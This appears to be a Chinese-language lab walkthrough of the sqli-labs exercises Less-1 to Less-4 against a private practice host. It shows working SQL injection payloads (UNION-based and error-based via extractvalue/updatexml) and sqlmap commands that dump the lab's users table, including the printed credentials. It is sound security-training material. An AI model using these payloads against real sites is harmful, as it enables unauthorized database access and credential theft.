Less-1
http://192.168.26.148/sql/Less-1/?id=1
\转义字符,把后面第一个东西变成字符串
输入\
显示near ''1\' LIMIT 0,1' at line 1
输入'
显示near ''1'' LIMIT 0,1' at line 1
估算闭合方式为 '
验证闭合
id=2' --+ 页面显示正常为'闭合
-为注释符
+为空格的意思
确定有多少栏目
id=2' order by 10 --+ 二分法估算
发现 order by 3 不报错 ,
order by 4报错 说明有3个栏目
Unknown column '4' in 'order clause'
方法一:手工UNION联合查询注入
id = -2' union select 1,2,3 --+ -2故意出错,显示union执行的操作
Welcome Dhakkan
Your Login name:2
Your Password:3
看到显示位为2和3位
查表名
一条一条查
id=-2' union select 1,table_name,3 from information_schema.tables where table_schema = 'security' limit 0,1 --+ 查第一个表
id=-2' union select 1,table_name,3 from information_schema.tables where table_schema = 'security' limit 0,2 --+ 查第二个表 以此类推
查询所有的表名
id=--2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+
emais
referes
uagents
users
查列名
id=-2' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
id
username
password
查字段
id=-2' union select 1,group_concat(username),group_concat(password) from users --+
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
=============================================================================================
方法二:手工报错型注入
爆库名
id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
或
id=1' and extractvalue(1,concat(0x7e,database(),0x7e))--+
或者
id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+
显示
XPATH syntax error: '~security~'
爆表名
id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
XPATH syntax error: '~emails,referers,uagents,users~'
爆列名
id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e))--+
XPATH syntax error: '~id,username,password~'
爆字段
id=1' and extractvalue(1,concat(0x7e,(select group_concat(id,username,0x7e,password) from users),0x7e)) --+
显示不出来的依次查下去
id=1' and extractvalue(1,concat(0x7e,(select group_concat(id,username,0x7e,password) from users where id not in (1)),0x7e)) --+
id=1' and extractvalue(1,concat(0x7e,(select group_concat(id,username,0x7e,password) from users where id not in (1,2)),0x7e)) --+
id=1' and extractvalue(1,concat(0x7e,(select group_concat(id,username,0x7e,password) from users where id not in (1,2,3)),0x7e)) --+
=============================================================================================
方法三:sqlmap工具自动注入
爆库名
sqlmap -u "http://192.168.26.148/sql/Less-1/?id=1" --current-db --batch
爆表名
Sqlmap -u "http://192.168.26.148/sql/Less-1/?id=1" --batch -D security --tables
爆字段,爆值
Sqlmap -u "http://192.168.26.148/sql/Less-1/?id=1" --batch -D security -T users --dump
2-4同上,只是闭合方式不同
2是 数字型注入
Less-2
?id=2\
near '\ LIMIT 0,1' at line 1
即什么都没有 数字型注入
order by判断
例如
方法一:手工UNION联合查询注入
id=-2 union select 1,group_concat(username),group_concat(password) from users --+
==============================================================================================================
方法二:手工报错型注入
id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
==============================================================================================================
方法三:sqlmap工具自动注入
sqlmap -u "http://192.168.26.148/sql/Less-2/?id=1" --current-db --batch
==============================================================================================================
Less-3
id=2\
near ''1\') LIMIT 0,1' at line 1
') --+ 闭合
方法一:手工UNION联合查询注入
方法二:手工报错型注入
方法三:sqlmap工具自动注入
==============================================================================================================
Less-4
\
near '"1\") LIMIT 0,1' at line 1
")
方法一:手工UNION联合查询注入
方法二:手工报错型注入
方法三:sqlmap工具自动注入